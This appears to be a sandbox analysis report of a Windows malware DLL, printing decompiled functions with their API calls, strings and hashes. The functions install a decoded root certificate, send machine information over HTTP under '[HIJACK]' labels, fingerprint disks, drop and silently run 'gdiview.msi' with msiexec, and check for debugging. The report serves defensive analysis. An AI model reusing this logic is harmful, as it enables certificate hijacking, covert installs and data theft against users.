						_t97 = _t48;
						if(_t48 != 0) {
							_t50 = E1001F6E0( &_v532, _t97, 0x80000002, "SOFTWARE\\Microsoft\\a0b923820dcc509a", _a4, _a8); // executed
							_t98 = _t50;
							if(_t50 != 0) {
								_t52 = E1001F6E0(_a8, _t98, 0x80000002, "SOFTWARE\\Microsoft\\9d4c2f636f067f89", _a4, _a8); // executed
								_t99 = _t52;
								if(_t52 != 0) {
									_t54 = E1001F650(_a4, _t99,  &_v804, _a4, _a8); // executed
									if(_t54 != 0) {
										_t55 = E1001F780(__ebx, _t77, __esi, _a4, _a8); // executed
										_t101 = _t55;
										if(_t55 != 0) {
											_t57 = E1001F6E0( &_v268, _t101, 0x80000002,  &_v268, _a4, _a8); // executed
											if(_t57 != 0) {
												_v536 = 1;
											}
										}
									}
								}
							}
						}
					}
				}
				return _v536;
			}

0x1001fa90
0x1001fa90
0x1001fa99
0x1001faa3
0x1001fab8
0x1001facd
0x1001fae4
0x1001faec
0x1001fb01
0x1001fb16
0x1001fb2d
0x1001fb35
0x1001fb4a
0x1001fb59
0x1001fb73
0x1001fb7b
0x1001fb7d
0x1001fb95
0x1001fb9d
0x1001fb9f
0x1001fbb4
0x1001fbbc
0x1001fbbe
0x1001fbd6
0x1001fbde
0x1001fbe0
0x1001fbf4
0x1001fbfc
0x1001fbfe
0x1001fc0f
0x1001fc19
0x1001fc23
0x1001fc2b
0x1001fc2d
0x1001fc43
0x1001fc4d
0x1001fc4f
0x1001fc4f
0x1001fc4d
0x1001fc2d
0x1001fc19
0x1001fbfe
0x1001fbe0
0x1001fbbe
0x1001fb9f
0x1001fc62

APIs

_memset.LIBCMT ref: 1001FAB8
SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FACD
_strcat_s.LIBCMT ref: 1001FAE4
_memset.LIBCMT ref: 1001FB01
SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FB16
_strcat_s.LIBCMT ref: 1001FB2D
_memset.LIBCMT ref: 1001FB4A

Part of subcall function 1001F9F0: _memset.LIBCMT ref: 1001FA0E
Part of subcall function 1001F9F0: _strcat_s.LIBCMT ref: 1001FA41
Part of subcall function 1001F9F0: _sprintf.LIBCMT ref: 1001FA68

Part of subcall function 1001F780: CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7BE
Part of subcall function 1001F780: CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F803
Part of subcall function 1001F780: CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F813
Part of subcall function 1001F780: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F842
Part of subcall function 1001F780: CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F861
Part of subcall function 1001F780: CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F9D2
Part of subcall function 1001F780: CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F9DC

Strings

\Microsoft\Windows\win_a.dat, xrefs: 1001FAD3
SOFTWARE\Microsoft\a0b923820dcc509a, xrefs: 1001FBCC
SOFTWARE\Microsoft\XAML_A, xrefs: 1001FB69
SOFTWARE\Microsoft\XAML_B, xrefs: 1001FB8B
SOFTWARE\Microsoft\9d4c2f636f067f89, xrefs: 1001FBEA
\Microsoft\Windows\4b5ce2fe28308fd9, xrefs: 1001FB1C

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Cert$_memset$CertificateContextStore_strcat_s$BinaryCryptFolderPathSpecialString$CloseCreateFreeOpen_sprintf
String ID: SOFTWARE\Microsoft\9d4c2f636f067f89$SOFTWARE\Microsoft\XAML_A$SOFTWARE\Microsoft\XAML_B$SOFTWARE\Microsoft\a0b923820dcc509a$\Microsoft\Windows\4b5ce2fe28308fd9$\Microsoft\Windows\win_a.dat
API String ID: 475603772-4188859120
Opcode ID: 0a5fcaf454aad501ee2a671e7f0111277b416851bab7cb84d5da4d1715e2ef5c
Instruction ID: 4e31c407b2421ecadd55cccd68f5b7507d928531dec073e07e65c36de6934fcb
Opcode Fuzzy Hash: 0a5fcaf454aad501ee2a671e7f0111277b416851bab7cb84d5da4d1715e2ef5c
Instruction Fuzzy Hash: BF41577AA00108B7E704DAA0DC46FF9336CDB64344F404098FE1C9A182EB71EB848BA1

Uniqueness

Uniqueness Score: -1.00%

Function 10022D00, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E10022D00(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v48;
				char _v76;
				char _v104;
				char _v132;
				intOrPtr _v136;
				char _v164;
				char _v192;
				char _v220;
				signed int _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				void* __ebp;
				char* _t75;
				intOrPtr _t77;
				void* _t109;
				void* _t110;
				void* _t113;
				intOrPtr _t154;
				intOrPtr _t157;
				void* _t160;
				void* _t164;

				_t164 = __eflags;
				_t156 = __esi;
				_t155 = __edi;
				_t114 = __ebx;
				_push(0xffffffff);
				_push(E100232E0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t157;
				_v224 = 0;
				_push(_a12);
				_push(0x4c);
				_push("post_info");
				_t75 = PathFindFileNameA(".\\post_info.cpp"); // executed
				E1001F230(__edi, "[HIJACK][%s][%s][%d]: data = %s\n", _t75); // executed
				_v48 = 0;
				_t77 = E10022530(__ebx, __edi, __esi, _t164, _a12);
				_t160 = _t157 - 0xe8 + 0x18;
				_v136 = _t77;
				E10001160( &_v132, _t164, 0x10025ca2);
				_v8 = 0;
				E10001160( &_v104, _t164, "info=");
				_v8 = 1;
				_v228 = E10001160( &_v164, _t164, _v136);
				_v232 = _v228;
				_v8 = 2;
				E10001A90( &_v104, _v232);
				_v8 = 1;
				E100011A0( &_v164);
				E10001160( &_v44, _t164, 0x10025ca3);
				_v8 = 3;
				E10001160( &_v76, _t164, 0x10025cb9);
				_v8 = 4;
				_v48 = 0;
				while(1) {
					_t165 = _v48 - 6;
					if(_v48 > 6) {
						break;
					}
					E100011C0( &_v132, 0x10025cba);
					_v236 = E10022710(_t114, _t155, _t156, _t165,  &_v192, _v48);
					_v240 = _v236;
					_v8 = 5;
					E10001A70( &_v132, _v240);
					_v8 = 4;
					E100011A0( &_v192);
					_v244 = E10001160( &_v220, _t165, _a8);
					_v248 = _v244;
					_v8 = 6;
					E10001A90( &_v132, _v248);
					_v8 = 4;
					E100011A0( &_v220);
					_push(E100011E0( &_v132));
					_push(0x61);
					_push("post_info");
					E1001F230(_t155, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp")); // executed
					E100011C0( &_v44, 0x10025cbb);
					E100011C0( &_v76, 0x10025cce);
					_t109 = E10001200( &_v104);
					_t110 = E100011E0( &_v104);
					E10021C30(_t114, _t155, _t156, _t165, 0, 0, 0, E100011E0( &_v132), 2, 1, 0, _t110, _t109, 0, 0, 0, 0, 0, 0,  &_v44,  &_v76); // executed
					_t160 = _t160 + 0x60;
					_t113 = E10001200( &_v44);
					_t166 = _t113;
					if(_t113 == 0) {
						_t154 = _v48 + 1;
						__eflags = _t154;
						_v48 = _t154;
						continue;
					} else {
					}
					break;
				}
				_push(_v136);
				E1000CA40(_t114, _t155, _t156, _t166);
				E10001110(_a4, _t166,  &_v76);
				_v224 = _v224 | 0x00000001;
				_v8 = 3;
				E100011A0( &_v76);
				_v8 = 1;
				E100011A0( &_v44);
				_v8 = 0;
				E100011A0( &_v104);
				_v8 = 0xffffffff;
				E100011A0( &_v132);
				 *[fs:0x0] = _v16;
				return _a4;
			}

0x10022d00
0x10022d00
0x10022d00
0x10022d00
0x10022d03
0x10022d05
0x10022d10
0x10022d11
0x10022d1e
0x10022d2b
0x10022d2c
0x10022d2e
0x10022d38
0x10022d44
0x10022d4c
0x10022d57
0x10022d5c
0x10022d5f
0x10022d6d
0x10022d72
0x10022d81
0x10022d86
0x10022d9c
0x10022da8
0x10022dae
0x10022dbc
0x10022dc1
0x10022dcb
0x10022dd8
0x10022ddd
0x10022de9
0x10022dee
0x10022df2
0x10022e04
0x10022e04
0x10022e08
0x00000000
0x00000000
0x10022e16
0x10022e2e
0x10022e3a
0x10022e40
0x10022e4e
0x10022e53
0x10022e5d
0x10022e71
0x10022e7d
0x10022e83
0x10022e91
0x10022e96
0x10022ea0
0x10022ead
0x10022eae
0x10022eb0
0x10022ec6
0x10022ed6
0x10022ee3
0x10022eff
0x10022f08
0x10022f23
0x10022f28
0x10022f2e
0x10022f33
0x10022f35
0x10022dfe
0x10022dfe
0x10022e01
0x00000000
0x00000000
0x10022f37
0x00000000
0x10022f35
0x10022f44
0x10022f45
0x10022f54
0x10022f62
0x10022f68
0x10022f6f
0x10022f74
0x10022f7b
0x10022f80
0x10022f87
0x10022f8c
0x10022f96
0x10022fa1
0x10022fab

APIs

PathFindFileNameA.KERNELBASE(.\post_info.cpp,post_info,0000004C,?), ref: 10022D38

Part of subcall function 1001F230: _memset.LIBCMT ref: 1001F25B
Part of subcall function 1001F230: OutputDebugStringA.KERNEL32(?,?,?,?,?,10022D49,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F293

Part of subcall function 10022530: _memset.LIBCMT ref: 10022584
Part of subcall function 10022530: _strlen.LIBCMT ref: 100225B8
Part of subcall function 10022530: _memset.LIBCMT ref: 10022626
Part of subcall function 10022530: _strlen.LIBCMT ref: 10022632

Part of subcall function 10022710: _memset.LIBCMT ref: 1002276B
Part of subcall function 10022710: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 1002278C

PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000061,00000000,?,?,?,info=,10025CA2), ref: 10022EBA

Part of subcall function 10021C30: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021D64
Part of subcall function 10021C30: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021DAC

Strings

.\post_info.cpp, xrefs: 10022EB5
post_info, xrefs: 10022EB0
[HIJACK][%s][%s][%d]: data = %s, xrefs: 10022D3F
info=, xrefs: 10022D79
[HIJACK][%s][%s][%d]: url = %s, xrefs: 10022EC1
.\post_info.cpp, xrefs: 10022D33
post_info, xrefs: 10022D2E

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$FileFindHttpNamePath_strlen$DebugLocalOpenOptionOutputStringTime
String ID: .\post_info.cpp$.\post_info.cpp$[HIJACK][%s][%s][%d]: data = %s$[HIJACK][%s][%s][%d]: url = %s$info=$post_info$post_info
API String ID: 2213638552-152146038
Opcode ID: 1568b6f6298a45623864e6ab8e00e2e8fe96cf20a69b2546b5d0c0ffb9461405
Instruction ID: 8607acd66d3c23fd638f037442e906d60192c638072a9ab774b96db5fff67154
Opcode Fuzzy Hash: 1568b6f6298a45623864e6ab8e00e2e8fe96cf20a69b2546b5d0c0ffb9461405
Instruction Fuzzy Hash: 57714E75D01248EBEB18DB94DD52BEEBB74EF18384F908098F60A77181EB712B45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1001D5C0, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1001D5C0(void* __edi, char* _a4) {
				intOrPtr _v8;
				struct _OVERLAPPED* _v12;
				signed int _v16;
				struct _OVERLAPPED* _v20;
				struct _OVERLAPPED* _v24;
				intOrPtr _v28;
				void* _v32;
				short _v548;
				char _v1010;
				char _v1068;
				char _v1070;
				intOrPtr _v1084;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				void _v1108;
				char _v2132;
				struct _OVERLAPPED* _v2136;
				char _v2137;
				long _v2144;
				struct _OVERLAPPED* _v2148;
				intOrPtr _v2152;
				char* _v2156;
				void* _t79;
				int _t87;
				intOrPtr _t91;
				intOrPtr _t96;
				void* _t125;
				void* _t126;
				void* _t127;

				_t125 = __edi;
				_v20 = 0;
				_v2136 = 0;
				_v24 = 0;
				do {
					wsprintfW( &_v548, L"\\\\.\\Scsi%d:", _v20);
					_t127 = _t127 + 0xc;
					_t79 = CreateFileW( &_v548, 0xc0000000, 3, 0, 3, 0, 0); // executed
					_v32 = _t79;
					if(_v32 != 0xffffffff) {
						_v12 = 0;
						while(1 != 0) {
							E1000CF80(_t125,  &_v1108, 0, 0x22d);
							_t127 = _t127 + 0xc;
							_v1104 = 0x49534353;
							_v1100 = 0x4b534944;
							_v1068 = _v12;
							_v1108 = 0x1c;
							_v1096 = 0x2710;
							_v1084 = 0x211;
							_v1092 = 0x1b0501;
							_v1070 = 0xec;
							_t87 = DeviceIoControl(_v32, 0x4d008,  &_v1108, 0x3c,  &_v1108, 0x22d,  &_v2144, 0); // executed
							if(_t87 == 0 || _v1010 == 0) {
								L20:
								if(_v2136 != 0) {
									L23:
								} else {
									_v12 =  &(_v12->Internal);
									if(_v12 < 2) {
										goto L23;
									} else {
										continue;
									}
								}
							} else {
								_v16 = 0;
								do {
									 *(_t126 + _v16 * 4 - 0x850) =  *(_t126 + _v16 * 2 - 0x424) & 0x0000ffff;
									_v16 = _v16 + 1;
								} while (_v16 < 0x100);
								_t91 = E1001CDD0( &_v2132);
								_t127 = _t127 + 4;
								_v28 = _t91;
								_v2148 = 0;
								_v8 = 0x104;
								_v2156 = _a4;
								_v2152 = _v28 - _a4;
								while(_v8 != 0x80000106) {
									_v2137 =  *((intOrPtr*)(_v2156 + _v2152));
									if(_v2137 != 0) {
										 *_v2156 = _v2137;
										_v2156 = _v2156 + 1;
										_t96 = _v8 - 1;
										_v8 = _t96;
										if(_t96 != 0) {
											continue;
										} else {
											L17:
											_v2156 = _v2156 - 1;
											_v2148 = 0x8007007a;
										}
									} else {
										break;
									}
									L18:
									 *_v2156 = 0;
									if(_v2148 < 0) {
										goto L20;
									} else {
										goto L24;
									}
									goto L25;
								}
								if(_v8 == 0) {
									goto L17;
								} else {
								}
								goto L18;
							}
							L25:
							FindCloseChangeNotification(_v32); // executed
							_v20 = _v24;
							goto L26;
						}
						L24:
						_v2136 = 1;
						goto L25;
					}
					L26:
					_v20 =  &(_v20->Internal);
					_v24 = _v20;
				} while (_v20 < 0x10);
				return _v2136;
			}

0x1001d5c0
0x1001d5c9
0x1001d5d0
0x1001d5da
0x1001d5e1
0x1001d5f1
0x1001d5f7
0x1001d610
0x1001d616
0x1001d61d
0x1001d623
0x1001d62a
0x1001d645
0x1001d64a
0x1001d64d
0x1001d657
0x1001d664
0x1001d66a
0x1001d674
0x1001d67e
0x1001d688
0x1001d692
0x1001d6c0
0x1001d6c8
0x1001d7ce
0x1001d7d5
0x1001d7ed
0x1001d7d7
0x1001d7e0
0x1001d7e6
0x00000000
0x1001d7e8
0x00000000
0x1001d7e8
0x1001d7e6
0x1001d6dd
0x1001d6dd
0x1001d6e4
0x1001d6f2
0x1001d6ff
0x1001d702
0x1001d712
0x1001d717
0x1001d71a
0x1001d71d
0x1001d727
0x1001d731
0x1001d73d
0x1001d743
0x1001d75a
0x1001d769
0x1001d779
0x1001d784
0x1001d78d
0x1001d790
0x1001d793
0x00000000
0x1001d795
0x1001d7a1
0x1001d7aa
0x1001d7b0
0x1001d7b0
0x1001d76b
0x00000000
0x1001d76b
0x1001d7ba
0x1001d7c0
0x1001d7ca
0x00000000
0x1001d7cc
0x00000000
0x1001d7cc
0x00000000
0x1001d7ca
0x1001d79d
0x00000000
0x00000000
0x1001d79f
0x00000000
0x1001d79d
0x1001d7fe
0x1001d802
0x1001d80b
0x00000000
0x1001d80b
0x1001d7f4
0x1001d7f4
0x00000000
0x1001d7f4
0x1001d80e
0x1001d814
0x1001d81a
0x1001d81d
0x1001d830

APIs

wsprintfW.USER32 ref: 1001D5F1
CreateFileW.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D610
_memset.LIBCMT ref: 1001D645
DeviceIoControl.KERNELBASE(000000FF,0004D008,0000001C,0000003C,0000001C,0000022D,?,00000000), ref: 1001D6C0
FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001D802

Strings

DISK, xrefs: 1001D657
\\.\Scsi%d:, xrefs: 1001D5E5
z, xrefs: 1001D7B0
SCSI, xrefs: 1001D64D

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ChangeCloseControlCreateDeviceFileFindNotification_memsetwsprintf
String ID: DISK$SCSI$\\.\Scsi%d:$z
API String ID: 2954624657-153650326
Opcode ID: 90ef5bbd0890bfc1898be704e586c13b7574c8df0df48dfabe30e792a59f74e8
Instruction ID: 864252d3b8c7652c0464aea4c6b0448db3b04a664ea9bb53ad0bcbd264417217
Opcode Fuzzy Hash: 90ef5bbd0890bfc1898be704e586c13b7574c8df0df48dfabe30e792a59f74e8
Instruction Fuzzy Hash: 30614AB4D04259DBDB20EF94CC94BAEBBB0FB44308F1081D9D548AB280DB759AC4CF85

Uniqueness

Uniqueness Score: -1.00%

Function 1001FCD0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001FCD0(void* __edi, void* __eflags) {
				char _v1027;
				char _v1028;
				char _v1291;
				char _v1292;
				int _t21;
				void* _t22;

				_t29 = __edi;
				_v1292 = 0;
				E1000CF80(__edi,  &_v1291, 0, 0x103);
				_v1028 = 0;
				E1000CF80(_t29,  &_v1027, 0, 0x3ff);
				GetTempPathA(0x104,  &_v1292);
				E1000CDB3( &_v1292,  &_v1292, 0x104, "gdiview.msi");
				E1000CCA3(_t29,  &_v1028, "msiexec.exe /i \"%s\"",  &_v1292);
				E1001FC70( &_v1292, 0x10027948, 0x39e00); // executed
				_t21 = PathFileExistsA( &_v1292); // executed
				_t38 = _t21;
				if(_t21 != 0) {
					_t22 = E1001A230(_t38,  &_v1028); // executed
					return _t22;
				}
				return _t21;
			}

0x1001fcd0
0x1001fcd9
0x1001fcee
0x1001fcf6
0x1001fd0b
0x1001fd1f
0x1001fd36
0x1001fd51
0x1001fd6a
0x1001fd79
0x1001fd7f
0x1001fd81
0x1001fd8a
0x00000000
0x1001fd8f
0x1001fd95

APIs

_memset.LIBCMT ref: 1001FCEE
_memset.LIBCMT ref: 1001FD0B
GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FD1F
_strcat_s.LIBCMT ref: 1001FD36
_sprintf.LIBCMT ref: 1001FD51

Part of subcall function 1001FC70: CreateFileA.KERNELBASE(10027948,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC93
Part of subcall function 1001FC70: WriteFile.KERNELBASE(00039E00,00000000,00000000,10027948,00000000), ref: 1001FCAE
Part of subcall function 1001FC70: CloseHandle.KERNEL32(00039E00), ref: 1001FCC3

PathFileExistsA.KERNELBASE(00000000), ref: 1001FD79

Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A245
Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A269
Part of subcall function 1001A230: CreateProcessA.KERNELBASE(00000000,1001FD8F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A28B
Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A299
Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A2A3

Strings

msiexec.exe /i "%s", xrefs: 1001FD45
gdiview.msi, xrefs: 1001FD25

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$CloseFileHandle$CreatePath$ExistsProcessTempWrite_sprintf_strcat_s
String ID: gdiview.msi$msiexec.exe /i "%s"
API String ID: 1459467440-729886463
Opcode ID: 638d147b60cdaad351f02d20a3a99ddd6a7d58331e397eb4a17339b0ef9d2ce5
Instruction ID: 3bad07f9b44ae76435dc987b8054c1e75e99d3347c25e4cce5c64bbb1e3e6184
Opcode Fuzzy Hash: 638d147b60cdaad351f02d20a3a99ddd6a7d58331e397eb4a17339b0ef9d2ce5
Instruction Fuzzy Hash: 651170B9D0021866E710D7A0AC46FEE73389B14705F4404E4EB48A5181EFB5A7C88F91

Uniqueness

Uniqueness Score: -1.00%

Function 100206B5, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E100206B5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t20;
				intOrPtr _t31;
				void* _t33;
				void* _t35;
				void* _t47;
				void* _t49;
				intOrPtr _t51;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;

				_t62 = __eflags;
				_t45 = __esi;
				_t44 = __edi;
				_t36 = __ebx;
				E1001FE40(); // executed
				E10020020(__ebx, __edi, __esi, __eflags, "install", "installp3", "-0.35", "52.0", "exe"); // executed
				_t51 = _t49 + 0x14 - 0x1c;
				_t37 = _t51;
				 *((intOrPtr*)(_t47 - 0x248)) = _t51;
				 *((intOrPtr*)(_t47 - 0x260)) = E10001160(_t51, __eflags, "status=main_start");
				E100202C0(__ebx, __edi, __esi, _t62); // executed
				_t52 = _t51 + 0x1c;
				_t20 = PathFileExistsA("C:\\hijack"); // executed
				if(_t20 != 0) {
					L7:
					_t53 = _t52 - 0x1c;
					 *((intOrPtr*)(_t47 - 0x24c)) = _t53;
					 *((intOrPtr*)(_t47 - 0x264)) = E10001160(_t53, __eflags, "status=check_debug");
					E100202C0(_t36, _t44, _t45, __eflags); // executed
					_t55 = _t53 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x250)) = _t55;
					 *((intOrPtr*)(_t47 - 0x268)) = E10001160(_t55, __eflags, "installp3");
					E1001FF30(_t36, _t44, _t45, __eflags); // executed
					_t57 = _t55 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x254)) = _t57;
					 *((intOrPtr*)(_t47 - 0x26c)) = E10001160(_t57, __eflags, "installp3");
					E1001FE50(_t36, _t44, _t45, __eflags); // executed
					_t59 = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x258)) = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x270)) = E10001160(_t59, __eflags, "status=main_over");
					E100202C0(_t36, _t44, _t45, __eflags); // executed
				} else {
					E1001A100(); // executed
					_t33 = E1001A110(_t37); // executed
					if(_t33 == 0 || E10019D70() != 0) {
					} else {
						_t35 = E1001FA90(_t36, _t44, _t45, __eflags, 0x3e8, 0); // executed
						_t52 = _t52 + 8;
						__eflags = _t35;
						if(__eflags != 0) {
							goto L7;
						} else {
						}
					}
				}
				E1001A2C0(); // executed
				 *((intOrPtr*)(_t47 - 0x25c)) = 1;
				 *((intOrPtr*)(_t47 - 4)) = 0xffffffff;
				E100011A0(_t47 - 0x28);
				_t31 =  *((intOrPtr*)(_t47 - 0x25c));
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t31;
			}

0x100206b5
0x100206b5
0x100206b5
0x100206b5
0x10020784
0x100207a2
0x100207aa
0x100207ad
0x100207af
0x100207bf
0x100207c5
0x100207ca
0x100207d2
0x100207da
0x10020810
0x10020810
0x10020815
0x10020825
0x1002082b
0x10020833
0x10020838
0x10020848
0x1002084e
0x10020856
0x1002085b
0x1002086b
0x10020871
0x10020879
0x1002087e
0x1002088e
0x10020894
0x100207dc
0x100207dc
0x100207e1
0x100207e8
0x100207f8
0x100207ff
0x10020804
0x10020807
0x10020809
0x00000000
0x00000000
0x1002080b
0x10020809
0x100207e8
0x1002089c
0x100208a1
0x100208ab
0x100208b5
0x100208ba
0x100208c3
0x100208ce

APIs

PathFileExistsA.KERNELBASE(C:\hijack), ref: 100207D2

Part of subcall function 10019D70: GetSystemDefaultLCID.KERNEL32 ref: 10019D7D

Strings

install, xrefs: 1002079D
-0.35, xrefs: 10020793
C:\hijack, xrefs: 100207CD
exe, xrefs: 10020789
status=main_start, xrefs: 100207B5
52.0, xrefs: 1002078E
installp3, xrefs: 10020798

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: DefaultExistsFilePathSystem
String ID: -0.35$52.0$C:\hijack$exe$install$installp3$status=main_start
API String ID: 482051434-415540327
Opcode ID: 4186cde2fd2be7eab9de03c2ae2b1e5fa7db8bba50aae912646796921070b1b9
Instruction ID: e003e7f35ba5866a000e498437e0e668718e67fe90f99aaae667264ec9ba667f
Opcode Fuzzy Hash: 4186cde2fd2be7eab9de03c2ae2b1e5fa7db8bba50aae912646796921070b1b9
Instruction Fuzzy Hash: 1A01D638D043055ED710FBA4AC4A6DE77A3DF41290F9401A9FA0467243EF31A5808AA2

Uniqueness

Uniqueness Score: -1.00%

Function 1001DC60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001DC60(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				struct _OSVERSIONINFOW _v284;
				char _v547;
				char _v548;
				char _v819;
				char _v820;
				char _v824;
				void* _t31;
				void* _t38;
				void* _t41;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t57;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t69 = __esi;
				_t68 = __edi;
				_t57 = __ebx;
				if(_a4 == 0) {
					return _t31;
				}
				_v820 = 0;
				E1000CF80(__edi,  &_v819, 0, 0x103);
				_v548 = 0;
				_t58 =  &_v547;
				E1000CF80(_t68,  &_v547, 0, 0x103);
				_t65 =  &(_v284.dwMajorVersion);
				E1000CF80(_t68,  &(_v284.dwMajorVersion), 0, 0x110);
				_t74 = _t71 + 0x24;
				_v284.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v284);
				if(_v284.dwMajorVersion != 6 || _v284.dwMinorVersion != 2) {
					L7:
					_t38 = E1001D840(_t68,  &_v548); // executed
					_t75 = _t74 + 4;
					__eflags = _t38;
					if(_t38 != 0) {
						L11:
						E1001D330(_t58,  &_v548);
						_t65 =  &_v820;
						_t41 = E1001CD50( &_v820, 0x104,  &_v824);
						_t77 = _t75 + 0x10;
						__eflags = _t41;
						if(_t41 >= 0) {
							_t65 = 0x104 - _v824;
							__eflags = 0x104;
							E1001CCB0( &_v548, 0x104 - _v824, _t70 + _v824 - 0x330);
							_t77 = _t77 + 0xc;
						}
						goto L13;
					}
					_t49 = E1001D5C0(_t68,  &_v548); // executed
					_t75 = _t75 + 4;
					__eflags = _t49;
					if(_t49 != 0) {
						goto L11;
					}
					_t58 =  &_v548;
					_t50 = E1001DAD0(_t68,  &_v548); // executed
					_t75 = _t75 + 4;
					__eflags = _t50;
					if(_t50 != 0) {
						goto L11;
					}
					_t65 =  &_v548;
					_t51 = E1001D3D0(_t57, _t68, _t69,  &_v548);
					_t77 = _t75 + 4;
					__eflags = _t51;
					if(_t51 == 0) {
						goto L13;
					}
					goto L11;
				} else {
					_t52 = E1001D2A0(); // executed
					if(_t52 == 0) {
						goto L7;
					}
					_t53 = E1001DAD0(_t68,  &_v548);
					_t77 = _t74 + 4;
					_t84 = _t53;
					if(_t53 != 0) {
						_t65 =  &_v548;
